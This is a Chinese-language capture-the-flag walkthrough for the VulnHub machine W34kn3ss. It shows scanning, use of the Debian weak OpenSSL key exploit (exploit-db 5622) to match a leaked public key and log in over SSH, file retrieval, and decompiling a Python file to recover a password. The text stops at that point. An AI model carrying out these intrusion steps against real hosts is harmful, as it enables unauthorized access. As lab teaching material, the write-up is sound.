一、靶机下载地址
https://www.vulnhub.com/entry/w34kn3ss-1,270/
二、信息收集
1、主机发现
# 使用命令
nmap 192.168.145.0/24 -sn | grep -B 2 "00:0C:29:ED:51:4D"
2、端口扫描
# 使用命令
nmap 192.168.145.208 -p- -sV
3、指纹识别
# 使用命令
whatweb 192.168.145.208
4、目录扫描
# 使用命令
dirsearch -u "http://192.168.145.208"
三、获取shell
1、访问靶机IP地址
2、拼接并访问/test
,提示需要 key
3、看看443端口得到的域名 weakness.jth
,但是访问不到,绑定一下hosts
192.168.145.208 weakness.jth
#Windows
C:\Windows\System32\drivers\etc\hosts
#Linux
/etc/hosts
4、兔子尾巴有一个值n30
,可能作为账号或密码
5、对http://weakness.jth/进行目录扫描
6、拼接访问 private
,有两个文件,看一下内容
7、mykey.pub文件内容
8、notes.txt文件内容,提示这个 key 由 openssl 0.9.8c-1 生成
9、kali 使用 searchsploit
工具查一下
# 使用命令
searchsploit 0.9.8c-1
10、将5622.txt文件保存到当前目录下
# 使用命令
searchsploit -m 5622
11、查看 5622.txt文件内容,给出了 url,需要下载
# URL
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/5622.tar.bz2
12、下载后,进行解压
# 使用命令
tar vxjf 5622.tar.bz2
13、匹配 mykey.pub
内容,得到公钥
# 使用命令
grep -r -l "ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEApC39uhie9gZahjiiMo+k8DOqKLujcZMN1bESzSLT8H5jRGj8n1FFqjJw27Nu5JYTI73Szhg/uoeMOfECHNzGj7GtoMqwh38clgVjQ7Qzb47/kguAeWMUcUHrCBz9KsN+7eNTb5cfu0O0QgY+DoLxuwfVufRVNcvaNyo0VS1dAJWgDnskJJRD+46RlkUyVNhwegA0QRj9Salmpssp+z5wq7KBPL1S982QwkdhyvKg3dMy29j/C5sIIqM/mlqilhuidwo1ozjQlU2+yAVo5XrWDo0qVzzxsnTxB5JAfF7ifoDZp2yczZg+ZavtmfItQt1Vac1vSuBPCpTqkjE/4Iklgw== root@targetcluster"
# 公钥
4161de56829de2fe64b9055711f531c1-2537.pub
14、进入对应目录,公钥连接ssh,连接成功
# 使用命令
cd rsa/2048
ssh -i 4161de56829de2fe64b9055711f531c1-2537 n30@192.168.145.208
四、提权
1、查看当前目录,发现 user.txt 和可执行文件 code
2、查看 user.txt
文件内容
3、查看 code 文件类型,是一个 python 文件
# 使用命令
file code
4、把文件 copy
复制到网站根目录,开启一个临时 web 服务,下载下来
# 使用命令
cp code /var/www/html
cd /var/www/html
python3 -m http.server
wget http://192.168.145.208:8000/code
5、使用 uncompyle6工具,下载命令
# 使用命令
pip install uncompyle6
6、修改 code
名为 code.pyc
,使用 uncompyle6
反编译,得到密码n30:dMASDNB!!#B!#!#33
# 使用命令
mv code code.pyc
uncompyle6 code.pyc